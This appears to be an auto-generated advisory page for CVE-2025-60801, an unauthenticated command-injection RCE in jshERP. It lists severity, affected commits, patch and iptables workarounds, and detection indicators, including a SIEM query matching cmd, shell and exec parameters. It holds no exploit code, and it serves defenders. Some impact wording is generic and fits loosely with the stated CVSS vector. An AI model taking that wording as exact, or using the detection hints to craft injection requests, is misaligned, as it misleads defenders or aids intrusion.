CVE-2025-60801 – jshERP up to commit fbda24da contains an unauth... (How to Fix)

Q: What is the severity of CVE-2025-60801?

CVE-2025-60801 has a CVSS score of 8.2 (HIGH). jshERP up to commit fbda24da contains an unauthenticated remote code execution vulnerability in the jsh_erp function. Attackers can execute arbitrary code on affected systems without authentication. This affects all deployments running vulnerable versions of jshERP.

📋 TL;DR

jshERP up to commit fbda24da contains an unauthenticated remote code execution vulnerability in the jsh_erp function. Attackers can execute arbitrary code on affected systems without authentication. This affects all deployments running vulnerable versions of jshERP.

💻 Affected Systems

Products:

jshERP

Versions: All versions up to commit fbda24da

Operating Systems: Any OS running jshERP

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments with the vulnerable code are affected regardless of configuration.

📦 What is this software?

Jsherp by Jishenghua

View all CVEs affecting Jsherp →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to install malware, steal data, pivot to other systems, or establish persistent access.

🟠

Likely Case

Attackers gain shell access to the server, potentially compromising the entire jshERP instance and any connected systems.

🟢

If Mitigated

Limited impact if network segmentation and strict access controls prevent lateral movement from the compromised system.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability is unauthenticated and public exploit details are available, making exploitation straightforward.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Versions after commit fbda24da

Vendor Advisory: https://github.com/jishenghua/jshERP/issues/132

Restart Required: Yes

Instructions:

1. Update to the latest version of jshERP after commit fbda24da. 2. Restart the jshERP service. 3. Verify the fix by checking the version.

🔧 Temporary Workarounds

Network Access Restriction

linux

Restrict network access to jshERP to only trusted IP addresses or internal networks.

iptables -A INPUT -p tcp --dport [jshERP_port] -s [trusted_ip] -j ACCEPT
iptables -A INPUT -p tcp --dport [jshERP_port] -j DROP

Web Application Firewall

all

Deploy a WAF with rules to block RCE attempts targeting the jsh_erp function.

🧯 If You Can't Patch

Isolate the jshERP system from critical networks and internet access.
Implement strict network segmentation and monitor for unusual outbound connections.

🔍 How to Verify

Check if Vulnerable:

Check if your jshERP version is at or before commit fbda24da by examining the git commit history or version files.

Check Version:

git log --oneline -1

Verify Fix Applied:

Confirm the system is running a version after commit fbda24da and test that the jsh_erp function no longer accepts malicious input.

📡 Detection & Monitoring

Log Indicators:

Unusual requests to jsh_erp function with shell commands
Unexpected process execution from jshERP context

Network Indicators:

Outbound connections from jshERP server to unknown IPs
Unusual traffic patterns to/from jshERP port

SIEM Query:

source="jshERP" AND (url="*jsh_erp*" AND (cmd="*" OR shell="*" OR exec="*"))

📊 Metadata

CVE ID: CVE-2025-60801

CVSS v3 Score: 8.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE: CWE-77

EPSS Score: 0.16% exploit probability (36.7th percentile)

Published: October 24, 2025

Last Updated: November 5, 2025

🔗 References

https://fushuling.com/index.php/2025/08/17/%e7%bb%95%e8%bf%87%e8%a1%a5%e4%b8%81%ef%bc%8c%e5%86%8d%e6%ac%a1%e5%ae%9e%e7%8e%b0%e5%8d%8e%e5%a4%8ferp%e6%9c%aa%e6%8e%88%e6%9d%83rce%e5%b7%b2%e4%bf%ae%e5%a4%8d/ Exploit,Third Party Advisory
https://github.com/jishenghua/jshERP/issues/132 Exploit,Issue Tracking,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-60801, you might also want to check these: